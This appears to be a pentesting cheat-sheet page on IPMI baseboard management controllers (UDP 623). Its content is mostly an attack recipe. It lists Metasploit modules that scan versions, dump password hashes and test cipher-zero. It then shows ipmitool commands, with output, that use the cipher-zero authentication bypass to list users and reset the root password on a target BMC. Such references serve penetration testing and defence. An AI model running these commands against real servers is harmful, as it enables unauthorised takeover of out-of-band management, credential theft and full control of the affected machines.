Physical attacks
Mobile Apps Pentesting
Pentesting

623/UDP - IPMI

Basic Information

Baseboard management controllers (BMCs) are embedded computers that provide out-of-band monitoring for desktops and servers. BMC products are sold under many brand names, including HP iLO, Dell DRAC, and Sun ILOM. Default Port: UDP/623

Enumeration

msf > use auxiliary/scanner/ipmi/ipmi_version
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf > use auxiliary/scanner/ipmi/ipmi_cipher_zero

Using ipmitoolbypassing authentication (-c 0) to change the root password to abc123:

root@kali:~# apt-get install ipmitool
root@kali:~# ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
2 root true true true ADMINISTRATOR
3 Oper1 true true true ADMINISTRATOR
root@kali:~# ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123